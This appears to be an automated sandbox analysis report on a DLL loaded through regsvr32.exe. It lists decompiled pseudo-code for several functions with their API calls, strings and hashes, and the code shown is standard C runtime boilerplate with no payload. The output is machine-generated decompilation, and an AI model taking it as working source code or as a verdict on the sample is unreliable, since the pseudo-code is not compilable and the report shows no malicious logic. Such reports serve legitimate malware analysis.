Instruction ID: bb14fcfa1c12384113d3a3affc7c2509a9eff0e432c10ab5b00696a16f017b15
Opcode Fuzzy Hash: 43d498b883869f491b085736dd0c27f921ff88a98f7f9083e81042c05d651716
Instruction Fuzzy Hash: 3B41A634900119DFCF10CFACD884A9EBBB9AF45328F148559EA185B391DBB1DB17CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 6EDA8258, Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 78
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E6EDA8258(void* __ecx, signed int* _a4, intOrPtr _a8) {
				signed int* _v8;
				void** _t12;
				void* _t16;
				void* _t18;
				signed int _t22;
				WCHAR* _t23;
				void** _t26;
				signed int* _t29;
				void* _t32;
				void* _t34;

				_t29 = _a4;
				while(_t29 != _a8) {
					_t22 =  *_t29;
					_t12 = 0x6edc4158 + _t22 * 4;
					_t32 =  *_t12;
					_v8 = _t12;
					if(_t32 == 0) {
						_t23 =  *(0x6edaef08 + _t22 * 4);
						_t32 = LoadLibraryExW(_t23, 0, 0x800);
						if(_t32 != 0) {
							L12:
							_t26 = _v8;
							 *_t26 = _t32;
							if( *_t26 != 0) {
								FreeLibrary(_t32);
							}
							L14:
							if(_t32 != 0) {
								_t16 = _t32;
								L18:
								return _t16;
							}
							L15:
							_t29 =  &(_t29[1]);
							continue;
						}
						_t18 = GetLastError();
						if(_t18 != 0x57) {
							L9:
							_t32 = 0;
							L10:
							if(_t32 != 0) {
								goto L12;
							}
							 *_v8 = _t18 | 0xffffffff;
							goto L15;
						}
						_t18 = E6EDA61C3(_t23, L"api-ms-", 7);
						_t34 = _t34 + 0xc;
						if(_t18 == 0) {
							goto L9;
						}
						_t18 = E6EDA61C3(_t23, L"ext-ms-", 7);
						_t34 = _t34 + 0xc;
						if(_t18 == 0) {
							goto L9;
						}
						_t18 = LoadLibraryExW(_t23, _t32, _t32);
						_t32 = _t18;
						goto L10;
					}
					if(_t32 == 0xffffffff) {
						goto L15;
					}
					goto L14;
				}
				_t16 = 0;
				goto L18;
			}

Strings

api-ms-, xrefs: 6EDA82AF
ext-ms-, xrefs: 6EDA82C3

Memory Dump Source

Source File: 00000002.00000002.1208455743.000000006EDA1000.00000020.00020000.sdmp, Offset: 6EDA0000, based on PE: true

Associated: 00000002.00000002.1208429273.000000006EDA0000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.1208473024.000000006EDAE000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.1208533213.000000006EDC3000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.1208565492.000000006EDC7000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID: api-ms-$ext-ms-
API String ID: 0-537541572
Opcode ID: e375af1407d5bcb2bbb884288d9eafdf02b491522527148fcde59e2ef8fea94c
Instruction ID: 1c09d5c04ab5e7505b0c5d6e8ad3c0d029158ad466de4312c68259c7878ec05d
Opcode Fuzzy Hash: e375af1407d5bcb2bbb884288d9eafdf02b491522527148fcde59e2ef8fea94c
Instruction Fuzzy Hash: D221C335A45AA1EBDB518BEDCD88A5E3B68EB03760B110211EF55A7284D730EF01C6E4

Uniqueness

Uniqueness Score: -1.00%

Function 6EDAB2C8, Relevance: 10.6, APIs: 7, Instructions: 65
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E6EDAB2C8(intOrPtr _a4) {
				void* _t18;

				_t45 = _a4;
				if(_a4 != 0) {
					E6EDAB290(_t45, 7);
					E6EDAB290(_t45 + 0x1c, 7);
					E6EDAB290(_t45 + 0x38, 0xc);
					E6EDAB290(_t45 + 0x68, 0xc);
					E6EDAB290(_t45 + 0x98, 2);
					E6EDA6B43( *((intOrPtr*)(_t45 + 0xa0)));
					E6EDA6B43( *((intOrPtr*)(_t45 + 0xa4)));
					E6EDA6B43( *((intOrPtr*)(_t45 + 0xa8)));
					E6EDAB290(_t45 + 0xb4, 7);
					E6EDAB290(_t45 + 0xd0, 7);
					E6EDAB290(_t45 + 0xec, 0xc);
					E6EDAB290(_t45 + 0x11c, 0xc);
					E6EDAB290(_t45 + 0x14c, 2);
					E6EDA6B43( *((intOrPtr*)(_t45 + 0x154)));
					E6EDA6B43( *((intOrPtr*)(_t45 + 0x158)));
					E6EDA6B43( *((intOrPtr*)(_t45 + 0x15c)));
					return E6EDA6B43( *((intOrPtr*)(_t45 + 0x160)));
				}
				return _t18;
			}

APIs

Part of subcall function 6EDAB290: _free.LIBCMT ref: 6EDAB2B5

_free.LIBCMT ref: 6EDAB316

Part of subcall function 6EDA6B43: HeapFree.KERNEL32(00000000,00000000,?,6EDA5D93), ref: 6EDA6B59
Part of subcall function 6EDA6B43: GetLastError.KERNEL32(?,?,6EDA5D93), ref: 6EDA6B6B

_free.LIBCMT ref: 6EDAB321
_free.LIBCMT ref: 6EDAB32C
_free.LIBCMT ref: 6EDAB380
_free.LIBCMT ref: 6EDAB38B
_free.LIBCMT ref: 6EDAB396
_free.LIBCMT ref: 6EDAB3A1

Memory Dump Source

Source File: 00000002.00000002.1208455743.000000006EDA1000.00000020.00020000.sdmp, Offset: 6EDA0000, based on PE: true

Associated: 00000002.00000002.1208429273.000000006EDA0000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.1208473024.000000006EDAE000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.1208533213.000000006EDC3000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.1208565492.000000006EDC7000.00000002.00020000.sdmp Download File

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: 5efe60baf44d8ba1c93d5764bc9e0069d11d7209c685432ebbda561d8b9dfbd0
Instruction ID: 0fbea92276f82ae511b53329233c3dd71db4e8014744cb88032081567fbcfd61
Opcode Fuzzy Hash: 5efe60baf44d8ba1c93d5764bc9e0069d11d7209c685432ebbda561d8b9dfbd0
Instruction Fuzzy Hash: A511C472960B0CAAD660ABF9CD09FCFB79DAB04704F444C16A3ADA6094DB65E7058760

Uniqueness

Uniqueness Score: -1.00%

Function 6EDAA3DB, Relevance: 9.3, APIs: 6, Instructions: 319
fileCOMMON

Download Yara Rule

C-Code - Quality: 67%

			E6EDAA3DB(void* __eflags, intOrPtr _a4, signed int _a8, signed char _a12, intOrPtr _a16) {
				signed int _v8;
				char _v16;
				char _v23;
				char _v24;
				void _v32;
				signed int _v33;
				long _v40;
				signed char _v44;
				char _v47;
				void _v48;
				intOrPtr _v52;
				long _v56;
				char _v60;
				intOrPtr _v68;
				char _v72;
				struct _OVERLAPPED* _v76;
				signed char _v80;
				signed char _v84;
				intOrPtr _v88;
				signed int _v92;
				char _v96;
				long _v100;
				intOrPtr _v104;
				intOrPtr _v108;
				signed char _v112;
				void* _v116;
				char _v120;
				int _v124;
				intOrPtr _v128;
				struct _OVERLAPPED* _v132;
				struct _OVERLAPPED* _v136;
				struct _OVERLAPPED* _v140;
				struct _OVERLAPPED* _v144;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t172;
				signed int _t174;
				int _t178;
				intOrPtr _t183;
				intOrPtr _t186;
				void* _t188;
				void* _t190;
				long _t193;
				void _t198;
				long _t202;
				void* _t206;
				intOrPtr _t212;
				signed char* _t213;
				char _t216;
				signed int _t219;
				char* _t220;
				void* _t222;
				long _t228;
				intOrPtr _t229;
				char _t231;
				signed char _t235;
				signed int _t244;
				intOrPtr _t247;
				signed char _t250;
				signed int _t251;
				signed char _t253;
				struct _OVERLAPPED* _t254;
				intOrPtr _t256;
				void* _t260;
				signed char _t261;
				void* _t262;
				void* _t264;
				long _t266;
				signed int _t269;
				long _t270;
				struct _OVERLAPPED* _t271;
				signed int _t272;
				intOrPtr _t274;
				signed int _t276;
				signed int _t279;
				long _t280;
				long _t281;
				signed char _t282;
				intOrPtr _t283;
				signed int _t284;
				void* _t285;
				void* _t286;

				_t172 =  *0x6edc3004; // 0xece3dae
				_v8 = _t172 ^ _t284;
				_t174 = _a8;
				_t261 = _a12;
				_t272 = (_t174 & 0x0000003f) * 0x38;
				_t244 = _t174 >> 6;
				_v112 = _t261;
				_v84 = _t244;
				_v80 = _t272;
				_t274 = _a16 + _t261;
				_v116 =  *((intOrPtr*)(_t272 +  *((intOrPtr*)(0x6edc3f50 + _t244 * 4)) + 0x18));
				_v104 = _t274;
				_t178 = GetConsoleCP();
				_t242 = 0;
				_v124 = _t178;
				E6EDA608C( &_v72, _t261, 0);
				asm("stosd");
				_t247 =  *((intOrPtr*)(_v68 + 8));
				_v128 = _t247;
				asm("stosd");
				asm("stosd");
				_t266 = _v112;
				_v40 = _t266;
				if(_t266 >= _t274) {
					L52:
					__eflags = _v60 - _t242;
				} else {
					_t276 = _v92;
					while(1) {
						_v47 =  *_t266;
						_v76 = _t242;
						_v44 = 1;
						_t186 =  *((intOrPtr*)(0x6edc3f50 + _v84 * 4));
						_v52 = _t186;
						if(_t247 != 0xfde9) {
							goto L23;
						}
						_t261 = _v80;
						_t212 = _t186 + 0x2e + _t261;
						_t254 = _t242;
						_v108 = _t212;
						while( *((intOrPtr*)(_t212 + _t254)) != _t242) {
							_t254 =  &(_t254->Internal);
							if(_t254 < 5) {
								continue;
							}
							break;
						}
						_t213 = _v40;
						_t269 = _v104 - _t213;
						_v44 = _t254;
						if(_t254 <= 0) {
							_t256 =  *((char*)(( *_t213 & 0x000000ff) + 0x6edc3750)) + 1;
							_v52 = _t256;
							__eflags = _t256 - _t269;
							if(_t256 > _t269) {
								__eflags = _t269;
								if(_t269 <= 0) {
									goto L44;
								} else {
									_t280 = _v40;
									do {
										_t262 = _t242 + _t261;
										_t216 =  *((intOrPtr*)(_t242 + _t280));
										_t242 =  &(_t242->Internal);
										 *((char*)(_t262 +  *((intOrPtr*)(0x6edc3f50 + _v84 * 4)) + 0x2e)) = _t216;
										_t261 = _v80;
										__eflags = _t242 - _t269;
									} while (_t242 < _t269);
									goto L43;
								}
							} else {
								_t270 = _v40;
								__eflags = _t256 - 4;
								_v144 = _t242;
								_t258 =  &_v144;
								_v140 = _t242;
								_v56 = _t270;
								_t219 = (0 | _t256 == 0x00000004) + 1;
								__eflags = _t219;
								_push( &_v144);
								_v44 = _t219;
								_push(_t219);
								_t220 =  &_v56;
								goto L21;
							}
						} else {
							_t228 =  *((char*)(( *(_t261 + _v52 + 0x2e) & 0x000000ff) + 0x6edc3750)) + 1;
							_v56 = _t228;
							_t229 = _t228 - _t254;
							_v52 = _t229;
							if(_t229 > _t269) {
								__eflags = _t269;
								if(_t269 > 0) {
									_t281 = _v40;
									do {
										_t264 = _t242 + _t261 + _t254;
										_t231 =  *((intOrPtr*)(_t242 + _t281));
										_t242 =  &(_t242->Internal);
										 *((char*)(_t264 +  *((intOrPtr*)(0x6edc3f50 + _v84 * 4)) + 0x2e)) = _t231;
										_t254 = _v44;
										_t261 = _v80;
										__eflags = _t242 - _t269;
									} while (_t242 < _t269);
									L43:
									_t276 = _v92;
								}
								L44:
								_t279 = _t276 + _t269;
								__eflags = _t279;
								L45:
								__eflags = _v60;
								_v92 = _t279;
							} else {
								_t261 = _t242;
								if(_t254 > 0) {
									_t283 = _v108;
									do {
										 *((char*)(_t284 + _t261 - 0xc)) =  *((intOrPtr*)(_t283 + _t261));
										_t261 = _t261 + 1;
									} while (_t261 < _t254);
									_t229 = _v52;
								}
								_t270 = _v40;
								if(_t229 > 0) {
									E6EDA4B70( &_v16 + _t254, _t270, _v52);
									_t254 = _v44;
									_t285 = _t285 + 0xc;
								}
								if(_t254 > 0) {
									_t261 = _v44;
									_t271 = _t242;
									_t282 = _v80;
									do {
										_t260 = _t271 + _t282;
										_t271 =  &(_t271->Internal);
										 *(_t260 +  *((intOrPtr*)(0x6edc3f50 + _v84 * 4)) + 0x2e) = _t242;
									} while (_t271 < _t261);
									_t270 = _v40;
								}
								_v136 = _t242;
								_v120 =  &_v16;
								_t258 =  &_v136;
								_v132 = _t242;
								_push( &_v136);
								_t235 = (0 | _v56 == 0x00000004) + 1;
								_v44 = _t235;
								_push(_t235);
								_t220 =  &_v120;
								L21:
								_push(_t220);
								_push( &_v76);
								_t222 = E6EDAB00D(_t258);
								_t286 = _t285 + 0x10;
								if(_t222 == 0xffffffff) {
									goto L52;
								} else {
									_t266 = _t270 + _v52 - 1;
									L31:
									_t266 = _t266 + 1;
									_v40 = _t266;
									_t193 = E6EDA7E45(_v124, _t242,  &_v76, _v44,  &_v32, 5, _t242, _t242);
									_t285 = _t286 + 0x20;
									_v56 = _t193;
									if(_t193 == 0) {
										goto L52;
									} else {
										if(WriteFile(_v116,  &_v32, _t193,  &_v100, _t242) == 0) {
											L51:
											_v96 = GetLastError();
											goto L52;
										} else {
											_t276 = _v88 - _v112 + _t266;
											_v92 = _t276;
											if(_v100 < _v56) {
												goto L52;
											} else {
												if(_v47 != 0xa) {
													L38:
													if(_t266 >= _v104) {
														goto L52;
													} else {
														_t247 = _v128;
														continue;
													}
												} else {
													_t198 = 0xd;
													_v48 = _t198;
													if(WriteFile(_v116,  &_v48, 1,  &_v100, _t242) == 0) {
														goto L51;
													} else {
														if(_v100 < 1) {
															goto L52;
														} else {
															_v88 = _v88 + 1;
															_t276 = _t276 + 1;
															_v92 = _t276;
															goto L38;
														}
													}
												}
											}
										}
									}
								}
							}
						}
						goto L53;
						L23:
						_t250 = _v80;
						_t261 =  *((intOrPtr*)(_t250 + _t186 + 0x2d));
						__eflags = _t261 & 0x00000004;
						if((_t261 & 0x00000004) == 0) {
							_v33 =  *_t266;
							_t188 = E6EDA9154(_t261);
							_t251 = _v33 & 0x000000ff;
							__eflags =  *((intOrPtr*)(_t188 + _t251 * 2)) - _t242;
							if( *((intOrPtr*)(_t188 + _t251 * 2)) >= _t242) {
								_push(1);
								_push(_t266);
								goto L30;
							} else {
								_t202 = _t266 + 1;
								_v56 = _t202;
								__eflags = _t202 - _v104;
								if(_t202 >= _v104) {
									_t261 = _v84;
									_t253 = _v80;
									_t242 = _v33;
									 *((char*)(_t253 +  *((intOrPtr*)(0x6edc3f50 + _t261 * 4)) + 0x2e)) = _v33;
									 *(_t253 +  *((intOrPtr*)(0x6edc3f50 + _t261 * 4)) + 0x2d) =  *(_t253 +  *((intOrPtr*)(0x6edc3f50 + _t261 * 4)) + 0x2d) | 0x00000004;
									_t279 = _t276 + 1;
									goto L45;
								} else {
									_t206 = E6EDA9021( &_v76, _t266, 2);
									_t286 = _t285 + 0xc;
									__eflags = _t206 - 0xffffffff;
									if(_t206 == 0xffffffff) {
										goto L52;
									} else {
										_t266 = _v56;
										goto L31;
									}
								}
							}
						} else {
							_t261 = _t261 & 0x000000fb;
							_v24 =  *((intOrPtr*)(_t250 + _t186 + 0x2e));
							_v23 =  *_t266;
							_push(2);
							 *(_t250 + _v52 + 0x2d) = _t261;
							_push( &_v24);
							L30:
							_push( &_v76);
							_t190 = E6EDA9021();
							_t286 = _t285 + 0xc;
							__eflags = _t190 - 0xffffffff;
							if(_t190 == 0xffffffff) {
								goto L52;
							} else {
								goto L31;
							}
						}
						goto L53;
					}
				}
				L53:
				if(__eflags != 0) {
					_t183 = _v72;
					_t167 = _t183 + 0x350;
					 *_t167 =  *(_t183 + 0x350) & 0xfffffffd;
					__eflags =  *_t167;
				}
				__eflags = _v8 ^ _t284;
				asm("movsd");
				asm("movsd");
				asm("movsd");
				return E6EDA3753(_a4, _t242, _v8 ^ _t284, _t261, _a4,  &_v96);
			}

APIs

GetConsoleCP.KERNEL32(00000000,00000001,00000000), ref: 6EDAA423
__fassign.LIBCMT ref: 6EDAA602
__fassign.LIBCMT ref: 6EDAA61F
WriteFile.KERNEL32(?,6EDA8BCE,00000000,?,00000000,?,?,?,?,?,?,?,?,?,?,00000000), ref: 6EDAA667
WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 6EDAA6A7
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000), ref: 6EDAA753

Memory Dump Source

Source File: 00000002.00000002.1208455743.000000006EDA1000.00000020.00020000.sdmp, Offset: 6EDA0000, based on PE: true

Associated: 00000002.00000002.1208429273.000000006EDA0000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.1208473024.000000006EDAE000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.1208533213.000000006EDC3000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.1208565492.000000006EDC7000.00000002.00020000.sdmp Download File

Similarity

API ID: FileWrite__fassign$ConsoleErrorLast
String ID:
API String ID: 4031098158-0
Opcode ID: a49494ff93f7357a8a859620b0a17f02b1f988967506156c4f241cf081a3d189
Instruction ID: 860fcf09e23edb023c94acc100a0919c9808c03de58f1e3a54159bedad078ace
Opcode Fuzzy Hash: a49494ff93f7357a8a859620b0a17f02b1f988967506156c4f241cf081a3d189
Instruction Fuzzy Hash: 41D1AE75D002599FDF11CFE8C8809EDBBB5AF49314F240259E959BB241E731AA46CF60

Uniqueness

Uniqueness Score: -1.00%

Function 6EDA49E7, Relevance: 9.1, APIs: 6, Instructions: 60
COMMON

Download Yara Rule

C-Code - Quality: 85%

			E6EDA49E7(void* __ecx) {
				void* _t4;
				void* _t8;
				void* _t11;
				void* _t13;
				void* _t14;
				void* _t18;
				void* _t23;
				long _t24;
				void* _t27;

				_t13 = __ecx;
				if( *0x6edc3020 != 0xffffffff) {
					_t24 = GetLastError();
					_t11 = E6EDA523D(_t13, __eflags,  *0x6edc3020);
					_t14 = _t23;
					__eflags = _t11 - 0xffffffff;
					if(_t11 == 0xffffffff) {
						L5:
						_t11 = 0;
					} else {
						__eflags = _t11;
						if(__eflags == 0) {
							_t4 = E6EDA5278(_t14, __eflags,  *0x6edc3020, 0xffffffff);
							__eflags = _t4;
							if(_t4 != 0) {
								_push(0x28);
								_t27 = E6EDA61B8();
								_t18 = 1;
								__eflags = _t27;
								if(__eflags == 0) {
									L8:
									_t11 = 0;
									E6EDA5278(_t18, __eflags,  *0x6edc3020, 0);
								} else {
									_t8 = E6EDA5278(_t18, __eflags,  *0x6edc3020, _t27);
									_pop(_t18);
									__eflags = _t8;
									if(__eflags != 0) {
										_t11 = _t27;
										_t27 = 0;
										__eflags = 0;
									} else {
										goto L8;
									}
								}
								E6EDA5FD1(_t27);
							} else {
								goto L5;
							}
						}
					}
					SetLastError(_t24);
					return _t11;
				} else {
					return 0;
				}
			}

APIs

GetLastError.KERNEL32(00000001,?,6EDA4555,6EDA3D73,6EDA378C,?,6EDA39C4,?,00000001,?,?,00000001,?,6EDC1420,0000000C,6EDA3ABD), ref: 6EDA49F5
___vcrt_FlsGetValue.LIBVCRUNTIME ref: 6EDA4A03
___vcrt_FlsSetValue.LIBVCRUNTIME ref: 6EDA4A1C
SetLastError.KERNEL32(00000000,6EDA39C4,?,00000001,?,?,00000001,?,6EDC1420,0000000C,6EDA3ABD,?,00000001,?), ref: 6EDA4A6E

Memory Dump Source

Source File: 00000002.00000002.1208455743.000000006EDA1000.00000020.00020000.sdmp, Offset: 6EDA0000, based on PE: true

Associated: 00000002.00000002.1208429273.000000006EDA0000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.1208473024.000000006EDAE000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.1208533213.000000006EDC3000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.1208565492.000000006EDC7000.00000002.00020000.sdmp Download File

Similarity

API ID: ErrorLastValue___vcrt_
String ID:
API String ID: 3852720340-0
Opcode ID: 2972f21d875326de2a064af2ac54e53313d0175510938ed321d428256d6d0303
Instruction ID: 71f4f4b541575d2f2121e7200f4cd3d29dfe587faafbeef98b5f046f78c9067f
Opcode Fuzzy Hash: 2972f21d875326de2a064af2ac54e53313d0175510938ed321d428256d6d0303
Instruction Fuzzy Hash: 2001DD335597239EBA551FFCDC4899A3A5CDB46BBD7200729E710450E0EF128A036254

Uniqueness

Uniqueness Score: -1.00%

Function 6EDA73B9, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 83
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E6EDA73B9(intOrPtr* _a4, intOrPtr _a8, intOrPtr _a16) {
				intOrPtr _t14;
				intOrPtr _t15;
				intOrPtr _t17;
				intOrPtr _t36;
				intOrPtr* _t38;
				intOrPtr _t39;

				_t38 = _a4;
				if(_t38 != 0) {
					__eflags =  *_t38;
					if( *_t38 != 0) {
						_t14 = E6EDA7E45(_a16, 0, _t38, 0xffffffff, 0, 0, 0, 0);
						__eflags = _t14;
						if(__eflags != 0) {
							_t36 = _a8;
							__eflags = _t14 -  *((intOrPtr*)(_t36 + 0xc));
							if(_t14 <=  *((intOrPtr*)(_t36 + 0xc))) {
								L10:
								_t15 = E6EDA7E45(_a16, 0, _t38, 0xffffffff,  *((intOrPtr*)(_t36 + 8)),  *((intOrPtr*)(_t36 + 0xc)), 0, 0);
								__eflags = _t15;
								if(__eflags != 0) {
									 *((intOrPtr*)(_t36 + 0x10)) = _t15 - 1;
									_t17 = 0;
									__eflags = 0;
								} else {
									E6EDA6A9D(GetLastError());
									_t17 =  *((intOrPtr*)(E6EDA6AD3(__eflags)));
								}
								L13:
								L14:
								return _t17;
							}
							_t17 = E6EDA7480(_t36, _t14);
							__eflags = _t17;
							if(_t17 != 0) {
								goto L13;
							}
							goto L10;
						}
						E6EDA6A9D(GetLastError());
						_t17 =  *((intOrPtr*)(E6EDA6AD3(__eflags)));
						goto L14;
					}
					_t39 = _a8;
					__eflags =  *((intOrPtr*)(_t39 + 0xc));
					if( *((intOrPtr*)(_t39 + 0xc)) != 0) {
						L5:
						 *((char*)( *((intOrPtr*)(_t39 + 8)))) = 0;
						_t17 = 0;
						 *((intOrPtr*)(_t39 + 0x10)) = 0;
						goto L14;
					}
					_t17 = E6EDA7480(_t39, 1);
					__eflags = _t17;
					if(_t17 != 0) {
						goto L14;
					}
					goto L5;
				}
				E6EDA74A7(_a8);
				return 0;
			}

Strings

C:\Windows\SysWOW64\regsvr32.exe, xrefs: 6EDA73BE

Memory Dump Source

Source File: 00000002.00000002.1208455743.000000006EDA1000.00000020.00020000.sdmp, Offset: 6EDA0000, based on PE: true

Associated: 00000002.00000002.1208429273.000000006EDA0000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.1208473024.000000006EDAE000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.1208533213.000000006EDC3000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.1208565492.000000006EDC7000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID: C:\Windows\SysWOW64\regsvr32.exe
API String ID: 0-3922119987
Opcode ID: a64d406f9bb44ee2b0312a2040d9e3797cb384b21089f7540188102f44ee768c
Instruction ID: 0e35897829bbf11f0c80e09427057b9ece89438d0da6da3787fb7c4de5fc4ae3
Opcode Fuzzy Hash: a64d406f9bb44ee2b0312a2040d9e3797cb384b21089f7540188102f44ee768c
Instruction Fuzzy Hash: 0B218372618209FF97509FFDCC40D9B7B6CEB013A87108928EB64961D8D771DE5087A0

Uniqueness

Uniqueness Score: -1.00%

Function 6EDA50E4, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 62
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E6EDA50E4(void* __ecx, signed int* _a4, intOrPtr _a8) {
				WCHAR* _v8;
				signed int _t11;
				WCHAR* _t12;
				struct HINSTANCE__* _t16;
				struct HINSTANCE__* _t18;
				signed int* _t22;
				signed int* _t26;
				struct HINSTANCE__* _t29;
				WCHAR* _t31;
				void* _t32;

				_t26 = _a4;
				while(_t26 != _a8) {
					_t11 =  *_t26;
					_t22 = 0x6edc3c68 + _t11 * 4;
					_t29 =  *_t22;
					if(_t29 == 0) {
						_t12 =  *(0x6edaeafc + _t11 * 4);
						_v8 = _t12;
						_t29 = LoadLibraryExW(_t12, 0, 0x800);
						if(_t29 != 0) {
							L13:
							 *_t22 = _t29;
							if( *_t22 != 0) {
								FreeLibrary(_t29);
							}
							L15:
							_t16 = _t29;
							L12:
							return _t16;
						}
						_t18 = GetLastError();
						if(_t18 != 0x57) {
							L8:
							 *_t22 = _t18 | 0xffffffff;
							L9:
							_t26 =  &(_t26[1]);
							continue;
						}
						_t31 = _v8;
						_t18 = E6EDA61C3(_t31, L"api-ms-", 7);
						_t32 = _t32 + 0xc;
						if(_t18 == 0) {
							goto L8;
						}
						_t18 = LoadLibraryExW(_t31, 0, 0);
						_t29 = _t18;
						if(_t29 != 0) {
							goto L13;
						}
						goto L8;
					}
					if(_t29 != 0xffffffff) {
						goto L15;
					}
					goto L9;
				}
				_t16 = 0;
				goto L12;
			}

APIs

FreeLibrary.KERNEL32(00000000,?,?,6EDA51A5,00000000,?,00000001,00000000,?,6EDA521C,00000001,FlsFree,6EDAEBB8,FlsFree,00000000), ref: 6EDA5174

Strings

api-ms-, xrefs: 6EDA5134

Memory Dump Source

Source File: 00000002.00000002.1208455743.000000006EDA1000.00000020.00020000.sdmp, Offset: 6EDA0000, based on PE: true

Associated: 00000002.00000002.1208429273.000000006EDA0000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.1208473024.000000006EDAE000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.1208533213.000000006EDC3000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.1208565492.000000006EDC7000.00000002.00020000.sdmp Download File

Similarity

API ID: FreeLibrary
String ID: api-ms-
API String ID: 3664257935-2084034818
Opcode ID: f662f66e5af51befc657a540cb5c8b1c3c48a28a0586ebe0809fde7811a2e361
Instruction ID: a52d993371eee3ce8bb481dd7fa9e086675a7bad4216c2742fff6e9ec511c78b
Opcode Fuzzy Hash: f662f66e5af51befc657a540cb5c8b1c3c48a28a0586ebe0809fde7811a2e361
Instruction Fuzzy Hash: 13117331A45A21EBEB524BACDC85B5E37A5AB02760F150221EF15EB2C0D770EB01CAD5

Uniqueness

Uniqueness Score: -1.00%

Function 6EDA5700, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 31
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 25%

			E6EDA5700(void* __ecx, intOrPtr _a4) {
				signed int _v8;
				_Unknown_base(*)()* _t8;
				_Unknown_base(*)()* _t14;

				_v8 = _v8 & 0x00000000;
				_t8 =  &_v8;
				__imp__GetModuleHandleExW(0, L"mscoree.dll", _t8, __ecx);
				if(_t8 != 0) {
					_t8 = GetProcAddress(_v8, "CorExitProcess");
					_t14 = _t8;
					if(_t14 != 0) {
						 *0x6edae104(_a4);
						_t8 =  *_t14();
					}
				}
				if(_v8 != 0) {
					return FreeLibrary(_v8);
				}
				return _t8;
			}

0x6eda5706
0x6eda570a
0x6eda5715
0x6eda571d
0x6eda5728
0x6eda572e
0x6eda5732
0x6eda5739
0x6eda573f
0x6eda573f
0x6eda5741
0x6eda5746
0x00000000
0x6eda574b
0x6eda5754

APIs

GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,6EDA56B2,?,?,6EDA567A,?,00000001,?), ref: 6EDA5715
GetProcAddress.KERNEL32(00000000,CorExitProcess,00000000,?,?,6EDA56B2,?,?,6EDA567A,?,00000001,?), ref: 6EDA5728
FreeLibrary.KERNEL32(00000000,?,?,6EDA56B2,?,?,6EDA567A,?,00000001,?), ref: 6EDA574B

Strings

CorExitProcess, xrefs: 6EDA5720
mscoree.dll, xrefs: 6EDA570E

Memory Dump Source

Source File: 00000002.00000002.1208455743.000000006EDA1000.00000020.00020000.sdmp, Offset: 6EDA0000, based on PE: true

Associated: 00000002.00000002.1208429273.000000006EDA0000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.1208473024.000000006EDAE000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.1208533213.000000006EDC3000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.1208565492.000000006EDC7000.00000002.00020000.sdmp Download File

Similarity

API ID: AddressFreeHandleLibraryModuleProc
String ID: CorExitProcess$mscoree.dll
API String ID: 4061214504-1276376045
Opcode ID: 4c7709b7514e1750dd5f3543e0fcff617733713e509a3e32c0ff871fab0eb520
Instruction ID: 43f7101099cb29eb8a849ebe12762ada551bdd61fd43c113be6052a8373aaa00
Opcode Fuzzy Hash: 4c7709b7514e1750dd5f3543e0fcff617733713e509a3e32c0ff871fab0eb520
Instruction Fuzzy Hash: E8F08C31900A19FBEF019B98CD59BADBB78FB41312F100160FE05A2250CB318F52DB91

Uniqueness

Uniqueness Score: -1.00%

Function 6EDA9C7B, Relevance: 7.7, APIs: 5, Instructions: 200
COMMON

Download Yara Rule

C-Code - Quality: 60%

			E6EDA9C7B(void* __ecx, intOrPtr* _a4, intOrPtr _a8, signed int _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, intOrPtr _a32, intOrPtr _a36) {
				signed int _v8;
				intOrPtr _v12;
				void* _v24;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t41;
				signed int _t49;
				void* _t51;
				signed int _t55;
				intOrPtr _t63;
				intOrPtr _t69;
				void* _t71;
				intOrPtr* _t72;
				intOrPtr _t86;
				void* _t89;
				intOrPtr* _t91;
				intOrPtr _t93;
				void* _t94;
				void* _t95;
				signed int _t96;
				void* _t97;
				intOrPtr* _t98;
				intOrPtr* _t100;
				void* _t103;

				_push(__ecx);
				_push(__ecx);
				_t41 =  *0x6edc3004; // 0xece3dae
				_v8 = _t41 ^ _t96;
				_t93 = _a20;
				if(_t93 > 0) {
					_t69 = E6EDAB3AC(_a16, _t93);
					_t103 = _t69 - _t93;
					_t4 = _t69 + 1; // 0x1
					_t93 = _t4;
					if(_t103 >= 0) {
						_t93 = _t69;
					}
				}
				_t88 = _a32;
				if(_a32 == 0) {
					_t88 =  *((intOrPtr*)( *_a4 + 8));
					_a32 =  *((intOrPtr*)( *_a4 + 8));
				}
